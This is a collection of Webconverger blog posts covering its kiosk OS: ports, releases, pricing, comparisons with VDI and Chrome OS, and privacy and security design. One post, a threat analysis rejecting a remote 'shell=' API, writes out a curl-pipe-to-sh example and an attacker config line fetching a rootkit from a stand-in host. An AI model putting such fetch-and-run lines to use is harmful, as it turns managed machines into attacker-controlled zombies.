Android 5.0's new features such as screen pinning and managed provisioning, has now enabled Webconverger to make a port without too much fuss, instead of say building a ROM.

At the time of writing, the current release is beta software and we are looking for interested testers!

Why Android? Pros:

• Better touch screen experience
• In future we should be able to leverage Android's native IMEs and easily support Korean, Japanese & Chinese inputs
• Android hardware is generally cheaper than PC hardware
• Android hardware is easier to deploy, especially in the DOOH use case. You could deploy on an ANDROID >=5.0 TV!
• TODO: Android is a better platform for pushing configuration updates, by leveraging Google Cloud Messaging

Cons:

• Not as fast as a desktop Intel PC setup
• Touch screen keyboards aren't as good as a PC keyboard for form entry (data entry use cases)
• Android 5.0 (Lollipop) devices are not widespread yet
• The NFC provisioning setup is a little clumsy, but it does work. If you want it, ask us!
• Installing from the Play store and running the App without provisioning works OK, until you get stuck on the lock screen. Note: This does not happen when provisioned!
• Updating and supporting the platform forever (one off subscriptions) like we do with the PC cannot be achieved since we are at the mercy of Google and the chosen update path of the hardware vendor

If you have an Android 5.0 (or above) device, check it out in the Play store. Thare are other Web kiosk apps in the Google play store, though they are not Opensource like our effort is. Futhermore now you can simply manage both Android and PC devices from our configuration service! That's a first!

Webconverger is sometimes compared to "thin client" solutions like those offered by Enterprise heavyweights like Amazon, VMWARE and Citrix solutions. In reality they are in a different market sector called Virtual Desktop Infrastructure. Nonetheless, it's a good exercise to compare a Webconverger to VDI for analysis.

This is our biased view and we would love to hear your feedback.

Network fault tolerance

Offline

If Webconverger goes offline, tasks like form filling will still work. Once a form is submitted it will retry until completed. Truthfully offline Web apps aren't quite there yet, though they should get better in the near future with technologies such as service workers.

Typically when a network connection is lost VDI solutions are unusable. Furthermore in some solutions, if the "management server" goes down, this can be another single point of failure. BetterVDI solutions can operate without a "management server" by caching its configuration. Webconverger actually also caches its configuration, in case https://config.webconverger.com/ goes down.

To summarise, Webconverger wins since it is more usable and will be even more usable in the future, offline.

Lag

Webconverger page loads will indeed suffer from a poor connection. However Web delivery is arguably "Internet grade" than typically LAN based "premise"VDI solutions where certain network assumptions are made and which will lag on the Internet. Once a Web application is loaded, it's very responsive and usable.

If your end to end network is managed by yourself, then this argument is probably moot, however this is increasingly rare as things move towards a more cost effective "cloud hosted"VDI.

Webconverger is powered by the Web and therefore is much more robust and usable on poor internet connections.

Scalability

VDI quickly advocate its solution as scalable. Webconverger has been specifically designed with an Internet connection in mind and will prove to be less of a burden on the network.

In summary Webconverger is very bandwidth efficient.

Control and management

An important component to "mass deployment" is control and management. With Webconverger you can streamline your business process by setting the default application even easier than you can with VDI solutions. Just update the homepage= URL, enter a password and any amount of machines attached to the configuration will have a new configuration applied on reboot.

However we do not allow administrators to monitor the exact screen of the end user as most VDI solutions do, for privacy reasons. Some Orwellian enterprises sadly require this invasive feature in order to be considered "enterprise grade".

To conclude, VDI has better controls, unless you care about end user privacy, and then you will want Webconverger.

Input & Output devices

Since Webconverger is limited to a Web browser for input and output for the end user, we are limited typically to abstracted Javascript APIs of:

• keyboard
• mouse
• printers
• touch screens
• microphone
• camera

Truthfully the microphone and camera access via getUserMedia APIs are variable, and it is unlikely to work well without careful consideration and testing of your hardware.

With VDI you typically have complete control of all input and outputs. So you can attach anything to your local device and you should be able to integrate it with your application as the vendor intended. Webconverger, or rather the browser currently is unable to support a range of devices like cash registers and smart cards which a lot of businesses rely upon. However there is usually an out of band (usually more expensive) alternative solution that can fulfill these use cases, such as logging in with 2 factor authentication or standalone electronic payment devices.

VDI wins here since it has better device control.

Legacy support for non-Web applications

Given a legacy (Windows) application, it's not reasonably possible to run that in a Web browser. This is definitely a strength of VDI solutions, as all sorts of odd legacy environments can be provisioned easily.

Webconverger is waiting for corporate infrastructure to migrate to SaaS and Web applications at that. The reasons to migrate to Web applications are several:

• open an application to a greater Internet audience
• leverage open standards
• reduce complexity

Of course some apps just can't be migrated easily to the Web, like display or compute intensive applications. e.g. CAD/matlab

However when applications are indeed Web applications, the Web has a good track record of backwards compatibility. Often one reason enterprises are burdened with odd insecure legacy platforms, is due to broken upgrade paths.

VDI is a better technology for supporting non-Web platforms, though hopefully the Web can maybe one day support VDIin the browser, with projects like freerdp-webconnect which still has a long way to go.

Hardware requirements

Webconverger runs on any PC with 1GB of RAM. Also we recently started testing on lower cost Android 5.0 and ARM7 Raspberry PI2 devices.

Typically VDI solutions run on PCs on top of pre-installed Windows operating systems, making it a heavyweight stack. However there are dedicated "locked down"VDI"thin client" hardware which can be quite inexpensive. One negative point is that this hardware is often proprietary and there is some lock in. On the contrary system integrators are usually better geared to supplying VDI solutions, since currently to deploy Webconverger, you need to source the hardware yourself.

Over time browsers and the Web applications they host may ask for more and more memory, making the base Webconverger system slower and slower. VDI solutions like Amazon workspaces correctly argue their VDIs can be provisioned with more memory or CPU on the server side. We would like to argue any client hardware in our experience probably needs to be replaced every 5-10 years and that cycle basically keeps up with Web browser and application bloat in that time.

Security

This is a complicated topic (devil is in the details!), though overall the two approaches share a similar security model, where the application and data are remotely hosted and not local.

Webconverger's main security strength is that it's not susceptible to key loggers and screen grabbers like all Windows based thin client applications tend to be. The VDI on the server might be well managed, but usually the underlying non-dedicated clients are poorly managed and maintained.

To summarise, assuming you are running Web applications in your business, the Webconverger system certainly has the edge. Webconverger offers a better user experience on a frequently unstable Internet, it's less complex and it offers better security than the typical vulnerable thin client running on Windows.

2015 has been a busy year. New Android 5 and Raspberry PI2 ports give customers cheaper hardware deployment options. All these different device architectures managed consistently via https://config.webconverger.com/.

The PC x86 version however is our mainstay and this is our last release based on Debian Wheezy. Debian's stable platform lived up to its name. It has been rock solid. Thank you to the Debian project, its developers and users. The next version "jessie" should run better on new Intel hardware.

28.0's most exciting new feature is opted in with the instantupdateAPI option which allows you to change the homepage remotely for one or many of your devices in an instant. No reboot required! See the instantupdate demo. The technology behind this is Websockets and the service runs upon https://wss.webconverger.com/.

The detailed changelog between 27.1 and 28.0 otherwise shows a raft of security updates and minor bug fixes. If you are Live user, you really must update for the Flash fixes alone. For install users... you should have nothing to worry about. Do double check the version on about: in case something is amiss.. it's never a bad idea to re-install (it only takes a couple of minutes)!

Coming soon: A major update where we will upgrade from Debian codename wheezy to jessie smoothly. Work in our testing branch is well underway and we hope to release the next version of "stable" soon after Debian makes the switch.

The sha256sum is ce422a67f18b8fbf97303bf421c0010f7d8af87b0c09fd78b9c281dca5cb9cbb webc-28.0.iso, please download from our CDN, where we are playing with some AWS credits for this release.

On April 25th, we demoed and launched the Raspberry PI2 port of Webconverger at "Tech Saturday" with the following pricing:

The hardware is about 90SGD, making the software about 60SGD or 45USD. Which is about 22% cost of the PC pricing.

As a bundle and with TCO in the sense this software will be updated into the future, this is breakthrough pricing for getting into Web signage.

Webconverger is distributing the bundle in Singapore via 12geeks. This saves the hassle of following several installation steps involved in putting the software on a microSD card. If you're interested in the bundle, please get in touch with sales!

As announced on twitter earlier this month, we achieved a significant technical accomplishment for Debian based derivatives doing the dreaded dist-upgrade.

A seamless upgrade. No config changes. No hoop jumping. No sweat. If you are running the install version that upgrades itself, you will now be based on Debian Jessie. The new "stable" major release of the underlying open Debian platform for Firefox that will be the basis for Webconverger for the next 3 years.

So we skipped version 29 and 30 marks the fact that we are on Debian Jessie 8.0. Hopefully the only difference you will notice is that this new release should run a bit better on newer hardware. There is an unfortunate caveat that if you are using a 486 kernel based Webconverger, your upgrade will not go smoothly. We noticed that most people using the 486 kernel were doing so mistakenly and we've asked the very few people that are affected, to please simply re-install with any version since 25. Usually you will find your machine to run better, since it's taking advantage of 686 multicore architecture. So yes, we are dropping 486 support.

The detailed changelog between 28.0 and 30.0 and of course this release includes the latest Firefox 38 at time of writing.

Many thanks to Matthijs Kooijman& Bizplay for helping realise this "no mean feat" of a release.

Notice a problem? Please let us know! Please download the new release from our CDN and the sha1sum is 9db8fb19bf63ab5d6b770f493bff825110d295c8. The webc-30.0 package list will show every package as being updated.

tl;dr Webconverger's current security model of enabling features through limited APIs is actually the right way to do it.

New functionality in Webconverger, means new APIs to control them. Since I can be too lazy to design an API, I've often thought about offering a shell API.

For example:

shell=https://example.com/hello.sh

Which downloads and executes the script. Analogous to curl https://example.com/hello.sh | sh"anti-pattern".

The pro with the shell API is that we can now create scripts on the fly, and so could clients to toggle some functionality like:

• Copying in a style sheet and overriding style
• Downloading service files and enabling / starting them (e.g. for motion detection hardware)
• Installing some special driver or configuring xinputs
• Tweaking wpa_supplicant@wlan0.service with wext for older wlan interfaces
• Overriding SSL warnings or preloading internal SSL certificates
• Probably most importantly: Freedom to create your own API!

So we can implement new functionality as clients needed them, without Webconverger requiring an reboot and upgrade!

BUT A SHELL API IS NOT SECURE

HTTP Secure doesn't help. Just imagine if someone managed to compromise https://config.webconverger.com. Every config could get an extra line:

shell=https://iamahacker.s3.amazonaws.com/rootkit.sh

Own4ge! 1000s of Webconverger machines could become zombies.

What about CODE SIGNING?

We could employ code signing on the shell API. I.e. before executing rootkit.sh, we also download rootkit.sh.gpg to check it's signed by someone trusted.

But who is going to be trusted? Ultimately, the Webconverger developer makes most sense. However this extra layer of security FAILs if the hacker managed to get the developers laptop where both GPG (for code signing) and SSH key (for config.webconverger.com git control) lies.

Too risky. Too much power in one place.

Lets get practical and think about security issues by:

1. The speed in which they take to fix (how much downtime will there be?)
2. The speed in which they take to detect (can we actually tell there is malicious code at play?)
3. The impact of the security issue (will clients lose data or hardware?)
4. The worst possible action customer needs to take (what does a client have to do?)

The shell= API would score:

1. Once the machine is compromised, it can't be fixed remotely
2. We probably cannot tell a machine has been compromised
3. The entire machine will effectively be lost to the hacker. Completely owned.
4. The client would have to re-install (which doesn't take long mind)

Back to the status quo

The reason that the APIs exist is to protect the Webconverger system from being permanently compromised. The APIs also offer crucially:

• idempotency
• safety from permanently damaging the system
• they are tested before bring rolled out

So even in the case where https://config.webconverger.com/ is totally compromised. What's the WORST possible outcome?

What currently are the WORST POSSIBLE SCENARIOS?

Today the worst possible scenarios for Webconverger clients controlled by a compromised https://config.webconverger.com/ are:

homepage= is changed to point to some offensive site

As soon as the compromise was realised, restoring config.webconverger.com is as simple as cloning a git repository onto a Web host that the DNS dig +short config.webconverger.com points to. The DNS record's TTL for config.webconverger.com is 60 seconds. DNS is hosted at Route 53 and the Registration is currently with Dreamhost, both are protected by 2 factor authentication.

The point is, config.webconverger.com can be restored very quickly if compromised. So the "hacked configuration" with the offensive site can be mitigated quickly.

Denial of service

A cronjob, for example rebooting Webconverger every minute would lead to denial of service. Again this can be mitigated quickly since config.webconverger.com is completely managed in source control is designed to be easily restored. However the client would need to be rebooted.

Browser sessions are not cleared between users

The "noclean" API means that Webconverger would not delete the ~/.mozilla directory between sessions. This could jeopardise users privacy local to the machine, as cookies etc would be shared amongst sessions. Again, once this discovered, it is very quickly rectified by effectively a reboot.

Our current API design served by https://config.webconverger.com/ would score:

1. Usually this would just require a reboot, but in the homepage= case with instantupdate, it could be quicker
2. We have a git log of all the configuration changes, so we can tell if something is amiss
3. The worst possible case is noclean mode, described above, which isn't nearly as bad as shell= potential of having root access
4. Worst possible case with config.webconverger.com, the machine would require a manual reboot

Wait... what if the upgrade mechanism got compromised?

Now it's probably worth mentioning the elephant in the room. What happens if https://github.com/webconverger/webc got compromised? The impact could be very bad (root), however note that upgrades only happen at boot with install versions. So there is a natural delay. Next the speed in which we can detect and fix a piece of malicious code injected into our repository should be VERY QUICK. https://github.com/Webconverger/webc/commits/master is closely watched. Finally the worst possible outcome for a client is a re-install.

Keeping to the current slow API design

So, thanks the API's safety and the way config.webconverger.com is managed, these "worst possible" scenarios are far less risky, since they are severely limited, quickly and easily fixed by a reboot. The current security design is a LOT better than if the machine turned into a Zombie via a remote scripting interface like shell=!

The down side is that you need to request every new feature and we need to implement it as an API. It's more secure that way.

Two months ago was our momentous Jessie based Webconverger 30 release and since then we've:

• Fixed an issue with printing
• Pushed Firefox 39
• Further locked down some new Mozilla anti-features like social services, pocket and hello URLs
• Received a fantastic endorsement from the (Internet) famous security pundit SwiftOnSecurity

https://github.com/webconverger/webc/compare/30.0...31.0 for details

Please download from http://dl.webconverger.com/latest.iso and follow the USB imaging guide to put it on a USB stick! The sha1sum is 4032c86eefdcbcb3486f7e00661d1f9920fffdf7.

What next?

We could really do with your feedback, help & support on a couple of goals for the next release:

• Making wireless setups easier
• Improve boot times
• Perhaps... work on efficient sharing a single machine with multiseat is there is a demand for it!

If you can't code or have the time to, pleasepurchase a subscription!

Other hardware news

Managed to integrate the EETI eGalaxTouch driver for some models of resistive touchscreens. It works well as your can see by this touch screen demo video and it's typically deployed in Point of Sales in retail. Unfortunately the driver is in a private branch since the End User of License is very limited and a good case study of how not to write a license. Please enquire to know more.

Recently obtained a ~130 USD Intel NUC NUC5CPYH and it works well as our single take NUC video shows. We have recommended this neat PC form factor before and thankfully they are getting better and cheaper.

Webconverger's main competitor especially in the K12 school (assessments) market is Google with their Google Chrome OS aka Chrome{books,box} product, which is typically sold as a hardware and software bundle.

It's high time to post an update on a 6 year old Comparing Google Chrome OS blog, which demonstrated that we had support for inexpensive Netbook category of PCs and speculated what Google would do. Six years later and Google are domineering.

To summarise; the main advantages that Webconverger has over Google are:

• Simpler, less is more. Less things to understand and we provide great customer service if you get stuck!
• No lock-in as opposed to Google Cloud Print, specific hardware, (App) extensions & other office related services upsell... these are all proprietary ways for Google to lock you into their solution
• We don't try to own your users, we don't ask users to login or register!

The products are comparable

Webconverger actually started before Google did, in 2007:

• Chrome for kiosks like regular Webconverger
• Chrome for signage like Webconverger Neon
• The Chrome management console is analogous to Webconverger's https://config.webconverger.com/ and API.

Pricing

Google recently became somewhat transparent with their pricing. We too offer discounts, and based upon their resellers perpetual license page they charge 150USD whilst we charge 200USD.

ChromeOS's perpetual Licenses seem analogous to our One off subscriptions. Like us they also do annual subscriptions, but oddly limited to North America. They charge 50USD per year and we currently charge 100USD.

We want to be competitive, so do please ask sales for a quote to beat.

Hardware

The hardware is difficult to directly compare since they design their own hardware and subsidise it accordingly. For example a Chromebook at 250USD is a good price, though you need to remember you are effectively locked to running Google software on that hardware, limiting your choice and making your switching cost very high.

Webconverger does not design hardware. We focus on supplying software that will run on any PC. This broadens your hardware choice and software choices too. Have old PC stock you want to deploy Webconverger to? No problem. What to run in Virtualbox? No problem with Webconverger.

Google's embrace, extend and extinguish... via extensions

One of our system integrators reports why he chose Webconverger:

1. The Chrome feature to allow a user to sign in to the browser itself is inappropriate in shared use environments. In practice users frequently forget to sign out! - Webconverger prevents this user misbehavior completely.

2. Installing Chrome Extensions is quickly becoming a 'go to' way for malicious actors to get malware onto endpoints even without Admin rights and again Webconverger prevents this from becoming an issue.

3. One other thing to note is that malicious Chrome Extensions 'follow' the Google user account from computer to computer. Any malicious Extensions must be deleted in the user account itself which adds to Administrator workload.

4. Simply closing all tabs to get a fresh session is much faster than the login/logout required on a fat client.

In the education environment Webconverger rocks!

What is the price of freedom?

We do currently charge a little bit more for our software. However running unconfigured or trialling our configuration management with several machines for a week or two is free of cost. As a business supporting an opensource product, we want to attract and invoice large deployments. Deployments where choice, privacy and openness about the way their clients get on the Web are important. They choose Webconverger.

Please contact sales for a competitive quote!

tl;dr We are closing the UK entity in favour of operating exclusively via the Singapore entity which (almost) all customers have already been using for the last couple of years. All assets have (or will be) transferred to the Singapore entity. This does not effect our regular use of the MIT license. Business as usual!

As mentioned in the acknowledgements of Webconverger, the opensource kiosk project was founded by myself Kai Hendry in February 2007 and then in September 2007 formed as a private limited company (Company No. 6366403) in the UK.

In 2012 I decided to move to Singapore largely due to my now wife and I incorporated a Singapore entity on the 4th May 2012 (Company No. 201211208C). I did this at the time mainly to help myself get a visa, to stay long term in Singapore. Unfortunately as a small business, the EntrePass assumes you have received some venture capital and I've long decided not to take Webconverger down that "get big or go bust" road.

Nonetheless as my confidence grew I moved more and more accounts to Singapore. Having the money in Singapore obviously helps with paying the bills without transferring money back and forth. In the meantime the upkeep of the UK business became more and more tiring.

Seemingly never a couple of months would pass without the need to be made aware of new HMRC or European regulation. It's frustrating that HMRC can't communicate directly with businesses online in 2015 and that silly European tax laws came into force. To keep up with regulation I needed to pay an accountant at least 1500GBP a year to complete corporate and personal tax returns.

For those of you interested in doing business in Singapore, the costs of running a business are roughly the same as the UK, especially since you need to nominate a local director here as a foreigner. There is a tax honeymoon period, but that soon expires and you will be paying roughly the same UK tax corporate rate of ~20%. With especially the European Commission's VATMOSS in mind, yes it is easier to run a software company in Singapore than in the UK. And the weather is a lot better!

I would like to thank you in advance for your understanding and support, and I look forward to serving you long into the future wherever you or I may be physically located. That said, if any of my customers are passing through Singapore, please get in touch! -Kai (Managing Director)

Prompted by the disturbing privacy defaults in Windows 10 and an enquiry whether Webconverger leaked any intranet information, we reviewed Firefox defaults.

This review was accomplished with Wireshark, a tool that allows us to analyse every packet leaving and entering a Webconverger instance.

• We did notice a lot of network noise chatter caused by safe browsing, location services & a media codec download
• We reduced this chatter by turning off these automatic Firefox services
• Finally, an upgrade process on an install was packet sniffed

Strictly speaking these Firefox defaults don't leak any private information and elements like safe browsing should give an extra layer of malware protection, but in practice the network noise generated by these services are too risky for security. Some future exploit could masquerade as one of the services we turned off and it would have been very difficult to have noticed it otherwise. Furthermore "Safe browsing" doesn't really have value when a typical Webconverger deployment is locked on a customer's homepage.

So our quiet defaults from version 32 can be overridden by your own Firefox preferences with our prefs= API to turn them back on for example.

Webconverger 32 with non-noisy defaults and ...

As mentioned what was coming next in Webconverger 31 release, we did make boots a few seconds faster by closing #220!

https://github.com/webconverger/webc/compare/31.0...32.0 for details and Firefox 41 is included.

c3c1ee4c594b50557ffdca62d56ff1e4b8bb106c  webc-32.0.iso

Please download from our CDN. Please support our continued operation by purchasing a subscription.

No user tracking

In the course of comparing privacy defaults with our Windows competitors such as Kioware and SiteKiosk, we did notice disturbingly they have features to log where kiosk users surf to.

We don't and by design can't log user activity from our end for privacy reasons. What we suggest customers do, is track the kiosk from their Web analytics platform:

homepage=https://example.com/kiosks/?id=WEBCID

You could then use that expanded WEBCID for tracking the particular kiosk on your site. Of course that strategy only applies to Web sites the kiosk owner controls.

If you, the kiosk owner wanted to know how many visits a kiosk user makes of for example Gmail, we can't tell you! Competitors allow you to do that, but we don't because we don't want to infringe on the privacy of Webconverger users. If you, the kiosk owner, don't want your kiosk users to go on other Websites, you need to use one of our filtering options or simply use our user interface without a URL bar option.

We hope that our policy gives users more confidence to use Webconverger branded kiosks in public spaces, since their privacy will be respected if they are permitted by kiosk owners to surf private Web sites.

Today Google have announced the chromebit with Single App CDM mode aka Chrome OS for kiosks which Webconverger has offered for several years now via https://config.webconverger.com/.

Google are charging 24USD a year for the service where we sell the service for 200USD one off (bulk discounts available!). Over the 7+ years we've offered commercial services supplying kiosk & signage OS software, our customers tell us they much prefer the one off cost since it's easier to budget for. Hardware wise, currently our full featured flagship product using the Firefox browser is PC only. Chrome OS is generally locked to particular hardware. We did make an effort to support the Raspberry Pi2, though recently efforts have somewhat stalled due a Broadcom graphics issue with Webkit2.

Besides the differences outlined in ChromeOS versus Webconverger, we do not allow remote screen grabs as we think it can violate user privacy. We also cannot tell how our kiosk is used, since we do not log the surfing session like out competitors do. We believe it is upto the configured homepage to determine how it was used.

So to summarise, we ask you to please consider Webconverger on PC as an alternative to Google Chrome OS on Chromebit with Single App CDM since:

• Webconverger is more transparent
• Webconverger cares more about privacy
• Webconverger is not Google. We do not depend on any Google service.
• We will not upsell you any Google service
• Supporting our work, will be indirectly support work for cheaper ARM based hardware support

Please ask us for an alternative kiosk quote where you can use your existing PC supplier/stock instead of being locked into the Google ecosystem.

This is very solid & stable release that businesses all around the world should be deploying Web applications with.

• Firefox 42
• Flash 11.2.202.548
• Further tweaks and lock downs
• https://github.com/webconverger/webc/compare/32.0...33.1 for details

The sha256sum for the image available for download on the CDN is:

b33927b80799cb874d30faf72488dde173716abe3658c48c267417344fcfe942  webc-33.1.iso

For those "power" system administrators, to celebrate the latest Wireshark release 2.0, here is a capture with homepage=about:blank. This should re-assure deployers that we keeping network noise to a minimum for your privacy and security.

With the arrival of free SSL certificates from Lets Encrypt, together with a kind offer from Fastly CDN(locations) to help distribute Webconverger since we are an opensource project, we are now serving our ISO over SSL from https://dl.webconverger.com/latest.iso. If there is a download problem, please get in touch & try this backup.

So serving over SSL greatly reduces the chance of some malicious actor intercepting your connection to our server and giving you a corrupt version of our ISO. That's never happened to our knowledge, though why not make it even less likely going into the future?! The sha256sum is:

a3d71fbd55d4eac2f65ceeefff557f57ab3b76e41ecd25d00c69b65c0d522667  webc-34.0.iso
2d7a9d6f2a4ec3cc48926f2362d86485e1080169e4940ad187be4b9b5bccf57a  webc-34.0.txt

Updates include:

• Firefox 44
• Ongoing security updates including the recent CVE-2015-7547 which we patched quickly thanks to the fantastic work of the Debian security team.
• Added Cambodian (Khmer) fonts via Google's fonts-noto package
• https://github.com/webconverger/webc/compare/33.1...34.0 for details

Please follow @webconverger on twitter for the very latest news.

Future plans

• We hope to move to systemd-networkd for the next release. This should shave seconds off boot times.
• We have someone new taking maintainership of the Rpi2 version, so expect some updates in the near future
• Keep absolutely rock solid & security patched for your business processes to run smoothly on the open Web!
• Please support our ongoing work by purchasing a subscription

From our last release 24,481 changed files:

• Much better new hardware support with the Linux 4.5 kernel from Debian backports
• Gtk3 with Firefox 46
• Raft of security updates like OpenSSL & Flash
• Bugfix: PDFjs not working in locales other than English #229
• Caveat: Virtualbox requires Virtualisation features enabled in your BIOS

Please fetch from our Fastly poweredhttps://dl.webconverger.com/latest.iso download. The sha1sum is 4e5589fa7b35b967b4ad884dd72aa8981a144ba0 webc-35.1.iso.

Kickstart Webconverger

From yesterday, configuring a device requires payment authorisation. The newStripe based billing system should make it painless for new subscribers who have just one or two machines to purchase a subscription. If you do encounter a problem, please email support.

The trial is 30 days and the initial price is 9.99USD a month. Our pricing is flexible and for large deployments and for the likes of non-profits and charities, we ask you please to get in contact with sales@webconverger.com.

We are hoping this new revenue stream will give us the resources to tackle our issue list, improve the Raspberry PI & Android versions and grow.

Is Webconverger free?

Webconverger will always be opensource, meaning you can check out the source code and fork Webconverger. Unconfigured it's still the best operating system to surf privately in my opinion.

There is no such thing as free of cost software. Since 2007 I've been working on Webconverger, mostly part time alongside my full time employment. Configured Webconverger is a paid product with a 30 day free trial and the revenue will go into engineering a better kiosk & Web signage system.

Webconverger's value is to give IT managers a streamlined tool to provide the Web in non-personal spaces so the public, students or business employees can access the Web privately and securely. Every commit we make is transparent & open. We ensure everything is patched, locked down and even go through lengths to packet sniff our software to ensure there are no leaks. Then we test Webconverger and test it again, and provide timely support.

If you or your company share our values, please subscribe to our service, that makes small and large deployments of Web browsers manageable and secure.

Webconverger was started because I couldn't trust those terminals and kiosks in public spaces to browse the Web.

I trust my work because I had a hand in building it, though there are some technical features which may convince you to trust it too.

First every commit is made publicly on Github. You can see me transparently make changes. You can verify every changed file. Every upstream file is a binary built by Debian, Mozilla & for flash, Adobe, again you can verify that using file checksums.

However how can you infer that the head of Webconverger git repository corresponds to an ISO release you downloaded which you would use to deploy to your hardware?

Previously you would have to trust the checksum I provided on the release page, but if you built Webconverger yourself, you would get a different checksum. A different checksum should make you suspicious that something nefarious was inserted in the build pipeline.

But why were the checksums different if you built this ISO yourself? Because the build chain would typically use the current date and when bundled up, the checksum is different. Chris Lamb has fixed this and now you can too can produce independently verifiable ISO builds of Webconverger. This security feature is called reproducible builds.

I must admit we owe the motivation to achieve this was due to Mozilla sponsoring Tails to do so. Webconverger achieved this feature before Tails, at a lower cost, funded by paying Webconverger subscribers. If you like our work, please tell your {school,office,company} IT department that this is the very best Web kiosk software.

The build system has been improved to use a third party continuous integration process at https://travis-ci.org/Webconverger/webc. The finished builds are uploaded to https://build.webconverger.com/. Since everything now is automated, much like the automatic updates do once Webconverger is installed on read/write medium, there is no need for releases anymore. Hence the x86 download button on the Webconverger homepage is set to https://build.webconverger.com/latest.iso.

Firefox as the choice browser for the x86 version in Webconverger is fast becoming in doubt. Reasons are:

1. Unable to lock down Firefox
2. Media playback has become a mess thanks to DRM

Unable to lock down Firefox

For over 10 years, all the crazy malfeatures Mozilla have introduced have been turned off via their extension/addon API and preferences. The webconverger-addon is a key component to Webconverger and without it, Firefox would be absolutely unusable and unsafe in a kiosk or Enterprise environment (think public banking).

Over the years extensions have become increasingly difficult to debug/develop , require signing and after Firefox 52 are likely to completely replaced by the incompatible WebExtensions.

Furthermore WebExtensions as it stands, appears to not have the APIs to lock down Firefox. It's unclear how long "legacy" addon API will be supported by Mozilla.

Media playback

Some Webconverger customers have their homepage set to Spotify for example. Spotify's Web interface used to require Adobe Flash which is distributed in Webconverger and that worked fine as a UX.

Spotify's new way with Firefox of playing back protected content is to click "Enable DRM"& download a three megabyte Widevine CDM binary and execute it. Even if I permitted this extremely questionable form of distribution, it does not appear to work.

Therefore I am tempted to tell my customers who require to playback DRM content, that we cannot service them.

The future

Thankfully there is ... one other opensource browser to choose, but I am very reluctant to choose it. I fear if everyone runs derivedWebkit, the open Web which I have personally strived for most of my adult life will be doomed.

Of course switching to https://webkitgtk.org/ would not be easy. Various elements like the powerful prefs API will have to go with Firefox, though a minority of Webconverger customers use that and probably less rely upon it.

To conclude, I am thankful for Firefox, they have had a good run and they probably do need to let their software die to re-invent itself. However this means turbulent times for Webconverger. I fear we will be distributing a "security unsupported" browser for a period of time before a good solution can be found. Thankfully the security design of Webconverger does reduce the risk of exploits by keeping sessions isolated.

Webconverger as a company will endeavour to manage this complex change, to be as seamless as possible for customers, so customers almost do not notice a browser change.

Our customers let us know about problems running Webconverger on the new hardware of:

• NUC7iBNK
• Dell Optiplex 7450s

Issues were LAN networking and video issues. This is a typical symptom of a new Intel hardware generation, namely the 7th generation. We have been a little fortunate that customers generally run our operating system on older hardware, somewhat reducing these sorts of issues. Recently Intel announced 8th generation.

Unfortunately each new hardware generation requires new drivers. I wish it didn't, but Intel's drivers do not seem to be always forward compatible. In the Linux ecosystem, this means an updated kernel and often Xorg drivers to support the new PC generation.

In Debian on which Webconverger is based, to get the latest kernel, you need to often do an entire distribution upgrade. Since Debian releases are typically frozen four years apart, it can be quite a challenging upgrade path!

We don't start from scratch, like re-installing a fresh copy of Windows. The reason why is that we are keen to keep the differences down using our git maintained rootfs. Though over time the position might become untenable. We've endeavoured to seamlessly support upgrades for our customer base, but the problem is... it's often a crazy amount of work. Tedious work that is manual and requiring a lot of test hardware. Worse is... work that often goes completely unnoticed!

The transition from Debian 8 (Jessie) to Debian 9 (Stretch) was an enormously stressful for me and I am thankful Matthijs Kooijman did such a great job. I laboriously ran as many tests as I could...

On 2017-09-06 I merged the 25805 file changes and I haven't had any negative feedback so far... However the now leader of Debian project has noticed I have broken reproducible builds. I will fix it or again contract someone to do it, since I am super busy.

To conclude, we have now taken many users through three major versions of Debian. I'm celebrating this release, the one you don't notice.